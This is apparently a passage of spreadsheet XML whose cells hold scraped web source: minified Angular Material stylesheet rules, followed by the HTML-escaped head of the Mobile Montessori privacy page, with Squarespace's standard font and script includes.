.mat-form-field-infix[_ngcontent-sc19]{padding:1em 0}.mat-form-field-appearance-outline[_ngcontent-sc19]   .mat-form-field-label[_ngcontent-sc19]{top:1.84375em;margin-top:-.25em}.mat-form-field-appearance-outline.mat-form-field-can-float[_ngcontent-sc19]   .mat-input-server[_ngcontent-sc19]:focus + .mat-form-field-label-wrapper[_ngcontent-sc19]   .mat-form-field-label[_ngcontent-sc19], .mat-form-field-appearance-outline.mat-form-field-can-float.mat-form-field-should-float[_ngcontent-sc19]   .mat-form-field-label[_ngcontent-sc19]{-ms-transform:translateY(-1.59375em) scale(.75);transform:translateY(-1.59375em) scale(.75);width:133.33333%}.mat-form-field-appearance-outline.mat-form-field-can-float[_ngcontent-sc19]   .mat-input-server[label][_ngcontent-sc19]:not(:label-shown)</t>
  </si>
  <si>
    <t>+ .mat-form-field-label-wrapper[_ngcontent-sc19]   .mat-form-field-label[_ngcontent-sc19]{-ms-transform:translateY(-1.59374em) scale(.75);transform:translateY(-1.59374em) scale(.75);width:133.33334%}.mat-grid-tile-footer[_ngcontent-sc19], .mat-grid-tile-header[_ngcontent-sc19]{font-size:14px}.mat-grid-tile-footer[_ngcontent-sc19]   .mat-line[_ngcontent-sc19], .mat-grid-tile-header[_ngcontent-sc19]   .mat-line[_ngcontent-sc19]{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;display:block;box-sizing:border-box}.mat-grid-tile-footer[_ngcontent-sc19]   .mat-line[_ngcontent-sc19]:nth-child(n+2), .mat-grid-tile-header[_ngcontent-sc19]   .mat-line[_ngcontent-sc19]:nth-child(n+2){font-size:12px}input.mat-input-element[_ngcontent-sc19]{margin-top:-.0625em}.mat-menu-item[_ngcontent-sc19]{font-family:Roboto,"Helvetica Neue",sans-serif;font-size:14px;font-weight:400}.mat-paginator[_ngcontent-sc19], .mat-paginator-page-size[_ngcontent-sc19]   .mat-select-trigger[_ngcontent-sc19]{font-family:Roboto,"Helvetica Neue",sans-serif;font-size:12px}.mat-radio-button[_ngcontent-sc19], .mat-select[_ngcontent-sc19]{font-family:Roboto,"Helvetica Neue",sans-serif}.mat-select-trigger[_ngcontent-sc19]{height:1.125em}.mat-slide-toggle-content[_ngcontent-sc19]{font-family:Roboto,"Helvetica Neue",sans-serif}.mat-slider-thumb-label-text[_ngcontent-sc19]{font-family:Roboto,"Helvetica Neue",sans-serif;font-size:12px;font-weight:500}.mat-stepper-horizontal[_ngcontent-sc19], .mat-stepper-vertical[_ngcontent-sc19]{font-family:Roboto,"Helvetica Neue",sans-serif}.mat-step-label[_ngcontent-sc19]{font-size:14px;font-weight:400}.mat-step-sub-label-error[_ngcontent-sc19]{font-weight:400}.mat-step-label-error[_ngcontent-sc19]{font-size:14px}.mat-step-label-selected[_ngcontent-sc19]{font-size:14px;font-weight:500}.mat-tab-group[_ngcontent-sc19]{font-family:Roboto,"Helvetica Neue",sans-serif}.mat-tab-label[_ngcontent-sc19], .mat-tab-link[_ngcontent-sc19]{font-family:Roboto,"Helvetica Neue",sans-serif;font-size:14px;font-weight:500}.mat-toolbar[_ngcontent-sc19], .mat-toolbar[_ngcontent-sc19]   h1[_ngcontent-sc19], .mat-toolbar[_ngcontent-sc19]   h2[_ngcontent-sc19], .mat-toolbar[_ngcontent-sc19]   h3[_ngcontent-sc19], .mat-toolbar[_ngcontent-sc19]   h4[_ngcontent-sc19], .mat-toolbar[_ngcontent-sc19]   h5[_ngcontent-sc19], .mat-toolbar[_ngcontent-sc19]   h6[_ngcontent-sc19]{font:500 20px/32px Roboto,"Helvetica Neue",sans-serif;margin:0}.mat-tooltip[_ngcontent-sc19]{font-family:Roboto,"Helvetica Neue",sans-serif;font-size:10px;padding-top:6px;padding-bottom:6px}.mat-tooltip-handset[_ngcontent-sc19]{font-size:14px;padding-top:8px;padding-bottom:8px}.mat-list-item[_ngcontent-sc19], .mat-list-option[_ngcontent-sc19]{font-family:Roboto,"Helvetica Neue",sans-serif}.mat-list-base[_ngcontent-sc19]   .mat-list-item[_ngcontent-sc19]{font-size:16px}.mat-list-base[_ngcontent-sc19]   .mat-list-item[_ngcontent-sc19]   .mat-line[_ngcontent-sc19]{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;display:block;box-sizing:border-box}.mat-list-base[_ngcontent-sc19]   .mat-list-item[_ngcontent-sc19]   .mat-line[_ngcontent-sc19]:nth-child(n+2){font-size:14px}.mat-list-base[_ngcontent-sc19]   .mat-list-option[_ngcontent-sc19]{font-size:16px}.mat-list-base[_ngcontent-sc19]   .mat-list-option[_ngcontent-sc19]   .mat-line[_ngcontent-sc19]{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;display:block;box-sizing:border-box}.mat-list-base[_ngcontent-sc19]   .mat-list-option[_ngcontent-sc19]   .mat-line[_ngcontent-sc19]:nth-child(n+2){font-size:14px}.mat-list-base[dense][_ngcontent-sc19]   .mat-list-item[_ngcontent-sc19]{font-size:12px}.mat-list-base[dense][_ngcontent-sc19]   .mat-list-item[_ngcontent-sc19]   .mat-line[_ngcontent-sc19]{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;display:block;box-sizing:border-box}.mat-list-base[dense][_ngcontent-sc19]   .mat-list-item[_ngcontent-sc19]   .mat-line[_ngcontent-sc19]:nth-child(n+2), .mat-list-base[dense][_ngcontent-sc19]   .mat-list-option[_ngcontent-sc19]{font-size:12px}.mat-list-base[dense][_ngcontent-sc19]   .mat-list-option[_ngcontent-sc19]   .mat-line[_ngcontent-sc19]{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;display:block;box-sizing:border-box}.mat-list-base[dense][_ngcontent-sc19]   .mat-list-option[_ngcontent-sc19]   .mat-line[_ngcontent-sc19]:nth-child(n+2){font-size:12px}.mat-list-base[dense][_ngcontent-sc19]   .mat-subheader[_ngcontent-sc19]{font-family:Roboto,"Helvetica Neue",sans-serif;font-size:12px;font-weight:500}.mat-option[_ngcontent-sc19]{font-family:Roboto,"Helvetica Neue",sans-serif;font-size:16px;color:rgba(0,0,0,.87)}.mat-optgroup-label[_ngcontent-sc19]{font:500 14px/24px Roboto,"Helvetica Neue",sans-serif;color:rgba(0,0,0,.54)}.mat-simple-snackbar[_ngcontent-sc19]{font-family:Roboto,"Helvetica Neue",sans-serif;font-size:14px}.mat-simple-snackbar-action[_ngcontent-sc19]{line-height:1;font-family:inherit;font-size:inherit;font-weight:500}.mat-ripple[_ngcontent-sc19]{overflow:hidden;position:relative}.mat-ripple.mat-ripple-unbounded[_ngcontent-sc19]{overflow:visible}.mat-ripple-element[_ngcontent-sc19]{position:absolute;border-radius:50%;pointer-events:none;transition:opacity,transform 0s cubic-bezier(0,0,.2,1);-ms-transform:scale(0);transform:scale(0)}@media (-ms-high-contrast:active){.mat-ripple-element[_ngcontent-sc19]{display:none}}.cdk-visually-hidden[_ngcontent-sc19]{border:0;clip:rect(0 0 0 0);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;outline:0;-webkit-appearance:none;-moz-appearance:none}.cdk-global-overlay-wrapper[_ngcontent-sc19], .cdk-overlay-container[_ngcontent-sc19]{pointer-events:none;top:0;left:0;height:100%;width:100%}.cdk-overlay-container[_ngcontent-sc19]{position:fixed;z-index:1000}.cdk-overlay-container[_ngcontent-sc19]:empty{display:none}.cdk-global-overlay-wrapper[_ngcontent-sc19]{display:-ms-flexbox;display:flex;position:absolute;z-index:1000}.cdk-overlay-pane[_ngcontent-sc19]{position:absolute;pointer-events:auto;box-sizing:border-box;z-index:1000;display:-ms-flexbox;display:flex;max-width:100%;max-height:100%}.cdk-overlay-backdrop[_ngcontent-sc19]{position:absolute;top:0;bottom:0;left:0;right:0;z-index:1000;pointer-events:auto;-webkit-tap-highlight-color:transparent;transition: opacity .4s cubic-bezier(.25,.8,.25,1);opacity:0}.cdk-overlay-backdrop.cdk-overlay-backdrop-showing[_ngcontent-sc19]{opacity:1}@media screen and (-ms-high-contrast:active){.cdk-overlay-backdrop.cdk-overlay-backdrop-showing[_ngcontent-sc19]{opacity:.6}}.cdk-overlay-dark-backdrop[_ngcontent-sc19]{background:rgba(0,0,0,.32)}.cdk-overlay-transparent-backdrop[_ngcontent-sc19], .cdk-overlay-transparent-backdrop.cdk-overlay-backdrop-showing[_ngcontent-sc19]{opacity:0}.cdk-overlay-connected-position-bounding-box[_ngcontent-sc19]{position:absolute;z-index:1000;display:-ms-flexbox;display:flex;-ms-flex-direction:column;flex-direction:column;min-width:1px;min-height:1px}.cdk-global-scrollblock[_ngcontent-sc19]{position:fixed;width:100%;overflow-y:scroll}@-webkit-keyframes cdk-text-field-autofill-start{}@keyframes cdk-text-field-autofill-start{}@-webkit-keyframes cdk-text-field-autofill-end{}@keyframes cdk-text-field-autofill-end{}.cdk-text-field-autofill-monitored[_ngcontent-sc19]:-webkit-autofill{-webkit-animation-name:cdk-text-field-autofill-start;animation-name:cdk-text-field-autofill-start}.cdk-text-field-autofill-monitored[_ngcontent-sc19]:not(:-webkit-autofill){-webkit-animation-name:cdk-text-field-autofill-end;animation-name:cdk-text-field-autofill-end}textarea.cdk-textarea-autosize[_ngcontent-sc19]{resize:none}textarea.cdk-textarea-autosize-measuring[_ngcontent-sc19]{height:auto!important;overflow:hidden!important;padding:2px 0!important;box-sizing:content-box!important}.mat-ripple-element[_ngcontent-sc19]{background-color:rgba(0,0,0,.1)}.mat-option.mat-selected[_ngcontent-sc19]:not(.mat-option-multiple):not(.mat-option-disabled), .mat-option[_ngcontent-sc19]:focus:not(.mat-option-disabled), .mat-option[_ngcontent-sc19]:hover:not(.mat-option-disabled){background:rgba(0,0,0,.04)}.mat-option.mat-active[_ngcontent-sc19]{background:rgba(0,0,0,.04);color:rgba(0,0,0,.87)}.mat-option.mat-option-disabled[_ngcontent-sc19]{color:rgba(0,0,0,.38)}.mat-primary[_ngcontent-sc19]   .mat-option.mat-selected[_ngcontent-sc19]:not(.mat-option-disabled){color:#3f51b5}.mat-accent[_ngcontent-sc19]   .mat-option.mat-selected[_ngcontent-sc19]:not(.mat-option-disabled){color:#ff4081}.mat-warn[_ngcontent-sc19]   .mat-option.mat-selected[_ngcontent-sc19]:not(.mat-option-disabled){color:#f44336}.mat-optgroup-disabled[_ngcontent-sc19]   .mat-optgroup-label[_ngcontent-sc19]{color:rgba(0,0,0,.38)}.mat-pseudo-checkbox[_ngcontent-sc19]{color:rgba(0,0,0,.54)}.mat-pseudo-checkbox[_ngcontent-sc19]::after{color:#fafafa}.mat-pseudo-checkbox-disabled[_ngcontent-sc19]{color:#b0b0b0}.mat-primary[_ngcontent-sc19]   .mat-pseudo-checkbox-checked[_ngcontent-sc19], .mat-primary[_ngcontent-sc19]   .mat-pseudo-checkbox-indeterminate[_ngcontent-sc19]{background:#3f51b5}.mat-accent[_ngcontent-sc19]   .mat-pseudo-checkbox-checked[_ngcontent-sc19], .mat-accent[_ngcontent-sc19]   .mat-pseudo-checkbox-indeterminate[_ngcontent-sc19], .mat-pseudo-checkbox-checked[_ngcontent-sc19], .mat-pseudo-checkbox-indeterminate[_ngcontent-sc19]{background:#ff4081}.mat-warn[_ngcontent-sc19]   .mat-pseudo-checkbox-checked[_ngcontent-sc19], .mat-warn[_ngcontent-sc19]   .mat-pseudo-checkbox-indeterminate[_ngcontent-sc19]{background:#f44336}.mat-pseudo-checkbox-checked.mat-pseudo-checkbox-disabled[_ngcontent-sc19], .mat-pseudo-checkbox-indeterminate.mat-pseudo-checkbox-disabled[_ngcontent-sc19]{background:#b0b0b0}.mat-elevation-z0[_ngcontent-sc19]{box-shadow:0 0 0 0</t>
  </si>
  <si>
    <t>rgba(0,0,0,.2),0 0 0 0 rgba(0,0,0,.14),0 0 0 0 rgba(0,0,0,.12)}.mat-elevation-z1[_ngcontent-sc19]{box-shadow:0 2px 1px -1px rgba(0,0,0,.2),0</t>
  </si>
  <si>
    <t>1px 1px 0 rgba(0,0,0,.14),0 1px 3px 0 rgba(0,0,0,.12)}.mat-elevation-z2[_ngcontent-sc19]{box-shadow:0 3px 1px -2px rgba(0,0,0,.2),0 2px 2px 0</t>
  </si>
  <si>
    <t>rgba(0,0,0,.14),0 1px 5px 0 rgba(0,0,0,.12)}.mat-elevation-z3[_ngcontent-sc19]{box-shadow:0 3px 3px -2px rgba(0,0,0,.2),0 3px 4px 0 rgba(0,0,0,.14),0 1px 8px 0 rgba(0,0,0,.12)}.mat-elevation-z4[_ngcontent-sc19]{box-shadow:0 2px 4px -1px rgba(0,0,0,.2),0 4px 5px 0</t>
  </si>
  <si>
    <t>rgba(0,0,0,.14),0 1px 10px 0 rgba(0,0,0,.12)}.mat-elevation-z5[_ngcontent-sc19]{box-shadow:0 3px 5px -1px rgba(0,0,0,.2),0 5px 8px 0</t>
  </si>
  <si>
    <t>rgba(0,0,0,.14),0 1px 14px 0 rgba(0,0,0,.12)}.mat-elevation-z6[_ngcontent-sc19]{box-shadow:0 3px 5px -1px rgba(0,0,0,.2),0 6px 10px 0</t>
  </si>
  <si>
    <t>rgba(0,0,0,.14),0 1px 18px 0 rgba(0,0,0,.12)}.mat-elevation-z7[_ngcontent-sc19]{box-shadow:0 4px 5px -2px rgba(0,0,0,.2),0 7px 10px 1px rgba(0,0,0,.14),0 2px</t>
  </si>
  <si>
    <t>16px 1px rgba(0,0,0,.12)}.mat-elevation-z8[_ngcontent-sc19]{box-shadow:0 5px 5px -3px rgba(0,0,0,.2),0 8px 10px 1px rgba(0,0,0,.14),0 3px 14px</t>
  </si>
  <si>
    <t>2px rgba(0,0,0,.12)}.mat-elevation-z9[_ngcontent-sc19]{box-shadow:0 5px 6px -3px rgba(0,0,0,.2),0 9px 12px 1px rgba(0,0,0,.14),0 3px 16px</t>
  </si>
  <si>
    <t>2px rgba(0,0,0,.12)}.mat-elevation-z10[_ngcontent-sc19]{box-shadow:0 6px 6px -3px rgba(0,0,0,.2),0 10px 14px 1px</t>
  </si>
  <si>
    <t>rgba(0,0,0,.14),0 4px 18px 3px rgba(0,0,0,.12)}.mat-elevation-z11[_ngcontent-sc19]{box-shadow:0 6px 7px -4px rgba(0,0,0,.2),0</t>
  </si>
  <si>
    <t>11px 15px 1px rgba(0,0,0,.14),0 4px 20px 3px rgba(0,0,0,.12)}.mat-elevation-z12[_ngcontent-sc19]{box-shadow:0 7px 8px -4px rgba(0,0,0,.2),0 12px 17px</t>
  </si>
  <si>
    <t>2px rgba(0,0,0,.14),0 5px 22px 4px rgba(0,0,0,.12)}.mat-elevation-z13[_ngcontent-sc19]{box-shadow:0 7px 8px -4px rgba(0,0,0,.2),0 13px 19px</t>
  </si>
  <si>
    <t>2px rgba(0,0,0,.14),0 5px 24px 4px rgba(0,0,0,.12)}.mat-elevation-z14[_ngcontent-sc19]{box-shadow:0 7px 9px -4px rgba(0,0,0,.2),0 14px 21px 2px rgba(0,0,0,.14),0 5px 26px</t>
  </si>
  <si>
    <t>4px rgba(0,0,0,.12)}.mat-elevation-z15[_ngcontent-sc19]{box-shadow:0 8px 9px -5px rgba(0,0,0,.2),0 15px 22px 2px rgba(0,0,0,.14),0 6px</t>
  </si>
  <si>
    <t>28px 5px rgba(0,0,0,.12)}.mat-elevation-z16[_ngcontent-sc19]{box-shadow:0 8px 10px -5px rgba(0,0,0,.2),0 16px 24px 2px rgba(0,0,0,.14),0 6px</t>
  </si>
  <si>
    <t>30px 5px rgba(0,0,0,.12)}.mat-elevation-z17[_ngcontent-sc19]{box-shadow:0 8px 11px -5px rgba(0,0,0,.2),0 17px 26px</t>
  </si>
  <si>
    <t>2px rgba(0,0,0,.14),0 6px 32px 5px rgba(0,0,0,.12)}.mat-elevation-z18[_ngcontent-sc19]{box-shadow:0 9px 11px -5px rgba(0,0,0,.2),0</t>
  </si>
  <si>
    <t>18px 28px 2px rgba(0,0,0,.14),0 7px 34px 6px rgba(0,0,0,.12)}.mat-elevation-z19[_ngcontent-sc19]{box-shadow:0 9px 12px -6px rgba(0,0,0,.2),0</t>
  </si>
  <si>
    <t>19px 29px 2px rgba(0,0,0,.14),0 7px 36px 6px rgba(0,0,0,.12)}.mat-elevation-z20[_ngcontent-sc19]{box-shadow:0 10px 13px -6px rgba(0,0,0,.2),0</t>
  </si>
  <si>
    <t>20px 31px 3px rgba(0,0,0,.14),0 8px 38px 7px rgba(0,0,0,.12)}.mat-elevation-z21[_ngcontent-sc19]{box-shadow:0 10px 13px -6px</t>
  </si>
  <si>
    <t>rgba(0,0,0,.2),0 21px 33px 3px rgba(0,0,0,.14),0 8px 40px 7px rgba(0,0,0,.12)}.mat-elevation-z22[_ngcontent-sc19]{box-shadow:0 10px 14px -6px rgba(0,0,0,.2),0</t>
  </si>
  <si>
    <t>22px 35px 3px rgba(0,0,0,.14),0 8px 42px 7px rgba(0,0,0,.12)}.mat-elevation-z23[_ngcontent-sc19]{box-shadow:0 11px 14px -7px</t>
  </si>
  <si>
    <t>rgba(0,0,0,.2),0 23px 36px 3px rgba(0,0,0,.14),0 9px 44px 8px rgba(0,0,0,.12)}.mat-elevation-z24[_ngcontent-sc19]{box-shadow:0 11px 15px -7px</t>
  </si>
  <si>
    <t>rgba(0,0,0,.2),0 24px 38px 3px rgba(0,0,0,.14),0 9px 46px</t>
  </si>
  <si>
    <t>8px rgba(0,0,0,.12)}.mat-app-background[_ngcontent-sc19]{background-color:#fafafa;color:rgba(0,0,0,.87)}.mat-theme-loaded-marker[_ngcontent-sc19]{display:none}.mat-autocomplete-panel[_ngcontent-sc19]{background:#fff;color:rgba(0,0,0,.87)}.mat-autocomplete-panel[_ngcontent-sc19]:not([class*=mat-elevation-z]){box-shadow:0 2px 4px -1px rgba(0,0,0,.2),0 4px 5px 0 rgba(0,0,0,.14),0 1px 10px 0 rgba(0,0,0,.12)}.mat-autocomplete-panel[_ngcontent-sc19]   .mat-option.mat-selected[_ngcontent-sc19]:not(.mat-active):not(:hover){background:#fff}.mat-autocomplete-panel[_ngcontent-sc19]   .mat-option.mat-selected[_ngcontent-sc19]:not(.mat-active):not(:hover):not(.mat-option-disabled){color:rgba(0,0,0,.87)}@media (-ms-high-contrast:active){.mat-badge-content[_ngcontent-sc19]{outline:solid 1px;border-radius:0}.mat-checkbox-disabled[_ngcontent-sc19]{opacity:.5}}.mat-badge-accent[_ngcontent-sc19]   .mat-badge-content[_ngcontent-sc19]{background:#ff4081;color:#fff}.mat-badge-warn[_ngcontent-sc19]   .mat-badge-content[_ngcontent-sc19]{color:#fff;background:#f44336}.mat-badge[_ngcontent-sc19]{position:relative}.mat-badge-hidden[_ngcontent-sc19]   .mat-badge-content[_ngcontent-sc19]{display:none}.mat-badge-disabled[_ngcontent-sc19]   .mat-badge-content[_ngcontent-sc19]{background:#b9b9b9;color:rgba(0,0,0,.38)}.mat-badge-content[_ngcontent-sc19]{color:#fff;background:#3f51b5;position:absolute;text-align:center;display:inline-block;border-radius:50%;transition:transform .2s</t>
  </si>
  <si>
    <t>ease-in-out;-ms-transform:scale(.6);transform:scale(.6);overflow:hidden;white-space:nowrap;text-overflow:ellipsis;pointer-events:none}.mat-badge-content._mat-animation-noopable[_ngcontent-sc19], .ng-animate-disabled[_ngcontent-sc19]   .mat-badge-content[_ngcontent-sc19]{transition:none}.mat-badge-content.mat-badge-active[_ngcontent-sc19]{-ms-transform:none;transform:none}.mat-badge-small[_ngcontent-sc19]   .mat-badge-content[_ngcontent-sc19]{width:16px;height:16px;line-height:16px}.mat-badge-small.mat-badge-above[_ngcontent-sc19]   .mat-badge-content[_ngcontent-sc19]{top:-8px}.mat-badge-small.mat-badge-below[_ngcontent-sc19]   .mat-badge-content[_ngcontent-sc19]{bottom:-8px}.mat-badge-small.mat-badge-before[_ngcontent-sc19]   .mat-badge-content[_ngcontent-sc19]{left:-16px}[dir=rtl][_ngcontent-sc19]   .mat-badge-small.mat-badge-before[_ngcontent-sc19]   .mat-badge-content[_ngcontent-sc19]{left:auto;right:-16px}.mat-badge-small.mat-badge-after[_ngcontent-sc19]   .mat-badge-content[_ngcontent-sc19]{right:-16px}[dir=rtl][_ngcontent-sc19]   .mat-badge-small.mat-badge-after[_ngcontent-sc19]   .mat-badge-content[_ngcontent-sc19]{right:auto;left:-16px}.mat-badge-small.mat-badge-overlap.mat-badge-before[_ngcontent-sc19]   .mat-badge-content[_ngcontent-sc19]{left:-8px}[dir=rtl][_ngcontent-sc19]   .mat-badge-small.mat-badge-overlap.mat-badge-before[_ngcontent-sc19]   .mat-badge-content[_ngcontent-sc19]{left:auto;right:-8px}.mat-badge-small.mat-badge-overlap.mat-badge-after[_ngcontent-sc19]   .mat-badge-content[_ngcontent-sc19]{right:-8px}[dir=rtl][_ngcontent-sc19]   .mat-badge-small.mat-badge-overlap.mat-badge-after[_ngcontent-sc19]   .mat-badge-content[_ngcontent-sc19]{right:auto;left:-8px}.mat-badge-medium[_ngcontent-sc19]   .mat-badge-content[_ngcontent-sc19]{width:22px;height:22px;line-height:22px}.mat-badge-medium.mat-badge-above[_ngcontent-sc19]   .mat-badge-content[_ngcontent-sc19]{top:-11px}.mat-badge-medium.mat-badge-below[_ngcontent-sc19]   .mat-badge-content[_ngcontent-sc19]{bottom:-11px}.mat-badge-medium.mat-badge-before[_ngcontent-sc19]   .mat-badge-content[_ngcontent-s</t>
  </si>
  <si>
    <t>&lt;!doctype html&gt;
&lt;html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" lang="en-US"  class="touch-styles"&gt;
  &lt;head&gt;
    &lt;meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
    &lt;!-- This is Squarespace. --&gt;&lt;!--</t>
  </si>
  <si>
    <t>mobilemontessori --&gt;
&lt;base href=""&gt;
&lt;meta charset="utf-8" /&gt;
&lt;title&gt;privacy &amp;mdash; Mobile Montessori&lt;/title&gt;
&lt;meta http-equiv="Accept-CH" content="Sec-CH-UA-Platform-Version, Sec-CH-UA-Model" /&gt;&lt;link rel="shortcut icon" type="image/x-icon" href="https://images.squarespace-cdn.com/content/v1/533c6f0ae4b0907609ac6309/1396909898010-M0LYCDYXGOBJAGQGR2MD/favicon.ico?format=100w"/&gt;
&lt;link rel="canonical" href="https://www.mobilemontessori.org/privacy"/&gt;
&lt;meta property="og:site_name" content="Mobile Montessori"/&gt;
&lt;meta property="og:title" content="privacy &amp;mdash; Mobile Montessori"/&gt;
&lt;meta property="og:url" content="https://www.mobilemontessori.org/privacy"/&gt;
&lt;meta property="og:type" content="website"/&gt;
&lt;meta itemprop="name" content="privacy — Mobile Montessori"/&gt;
&lt;meta itemprop="url" content="https://www.mobilemontessori.org/privacy"/&gt;
&lt;meta name="twitter:title" content="privacy — Mobile Montessori"/&gt;
&lt;meta name="twitter:url" content="https://www.mobilemontessori.org/privacy"/&gt;
&lt;meta name="twitter:card" content="summary"/&gt;
&lt;meta name="description" content="" /&gt;
&lt;link rel="preconnect" href="https://images.squarespace-cdn.com"&gt;
&lt;script type="text/javascript" src="//use.typekit.net/ik/Tk0sDIhVNTEgI1wbO0tGYcbKfFizaRNlkDdMwQYUIn6fenXBfFHN4UJLFRbh52jhWD9DwhwhZRgyZQsKw2q3FDj35ABRFRw35s7AMkG0jAFu-WsoShFGZAsude80ZkoRdhXCHKoyjamTiY8Djhy8ZYmC-Ao1Oco8if37OcBDOcu8OfG0dANK-AU8dAN0iemDShNk-PoDSWmyScmDSeBRZPoRdhXCHKoDSWmyScmDSeBRZWFR-emqiAUTdcS0jhNlOeBRiA8XpWFR-emqiAUTdcS0jhNlOeBRiA8XpWFR-emqiAUTdcS0dcmXOeBDOcu8OeUzjhBC-eNDifUldh4TdemldhoXZWFDda4TOcNkZkUldh4TdemldhoXZWFDda4TO1FUiABkZWF3jAF8OcFzdPUDSWmyScmDSeBRZWFR-emqiAUTdcS0jhNlOYiaikoyjamTiY8Djhy8ZYmC-Ao1OcFzdPUaiaS0jAFu-WsoShFGZAsude80Zko0ZWbCiaiaOcBDOcu8OYiaikoldh4TdemldhoXZWFDda4TOcNkZkUaiaS0dANK-AU8dAN0iemDShNk-PoDSWmyScmDSeBRZPoRdhXCiaiaO1FUiABkZWF3jAF8ShFGZAsude80ZkoRdhXKghFydeUudcIKIcBqdh48OAiyScBldhoqOWgkdkJHdA80-AN0OWgkdkJbjW40dku3ScvlZe8DSeUypPJsZe80OAFzdcs8d1F8ZfuaZAJ7fbRF2UMMeMb6MKG4fVwXIMIjgfMfH6qJv2bbMs6YJMJ7fbRkFgMgeMt6MKG4fVIXIMIjIPMfH6qJGQ9bMy6IJMJ7fbKSFsMfeMS6MKG4f4tuIMJj2KMfH6qJ1Q9bMy6sJMJ7f6KrRMIbMU6IJMJ7f6KoRMIbMU6YJMJ7f6K_RMIbMU65JMJ7f6KERMIbMU6sJMJ7f6K4xMIbgg62JMJ7fbR_mgMIeMb6MTMgvOh013j.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript"&gt;try{Typekit.load();}catch(e){}&lt;/script&gt;
&lt;link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css2?family=Abel:wght@400&amp;family=Cabin:wght@500&amp;family=Source+Code+Pro:ital,wght@0,300;0,400;0,700;1,300;1,700"&gt;
&lt;script type="text/javascript" crossorigin="anonymous" nomodule="nomodule" src="//assets.squarespace.com/@sqs/polyfiller/1.6/legacy.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" crossorigin="anonymous" src="//assets.squarespace.com/@sqs/polyfiller/1.6/modern.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript"&gt;SQUARESPACE_ROLLUPS = {};&lt;/script&gt;
&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/extract-css-runtime-d3ef3b0467b518716f499-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-extract_css_runtime');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/extract-css-runtime-d3ef3b0467b518716f499-min.en-US.js" &gt;&lt;/script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js =</t>
  </si>
  <si>
    <t>["//assets.squarespace.com/universal/scripts-compressed/extract-css-moment-js-vendor-5082e2dab696b020ac83a-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-extract_css_moment_js_vendor');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/extract-css-moment-js-vendor-5082e2dab696b020ac83a-min.en-US.js" &gt;&lt;/script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/cldr-resource-pack-56fdc0b6309d3f37f75e8-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-cldr_resource_pack');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/cldr-resource-pack-56fdc0b6309d3f37f75e8-min.en-US.js" &gt;&lt;/script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/common-vendors-stable-dade9d616ff90ebf99b1d-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-common_vendors_stable');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/common-vendors-stable-dade9d616ff90ebf99b1d-min.en-US.js" &gt;&lt;/script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/common-vendors-fb8be9b2d78e372bb6e06-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-common_vendors');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/common-vendors-fb8be9b2d78e372bb6e06-min.en-US.js" &gt;&lt;/script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/common-366ba4c7e56d9e65f83d2-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-common');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/common-366ba4c7e56d9e65f83d2-min.en-US.js" &gt;&lt;/script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squarespace.com/universal/scripts-compressed/commerce-23e269feee73030191e32-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-commerce');&lt;/script&gt;
&lt;script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/commerce-23e269feee73030191e32-min.en-US.js" &gt;&lt;/script&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].css = ["//assets.squarespace.com/universal/styles-compressed/commerce-42e904b2189a7c1684dd6-min.en-US.css"]; })(SQUARESPACE_ROLLUPS, 'squarespace-commerce');&lt;/script&gt;
&lt;link rel="stylesheet" type="text/css" href="//assets.squarespace.com/universal/styles-compressed/commerce-42e904b2189a7c1684dd6-min.en-US.css"&gt;&lt;script&gt;(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js =</t>
  </si>
  <si>
    <t>["//assets.squarespace.com/universal/scripts-compressed/user-account-core-b732b38a80f113148ce74-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-user_account_core');&lt;/script&gt;
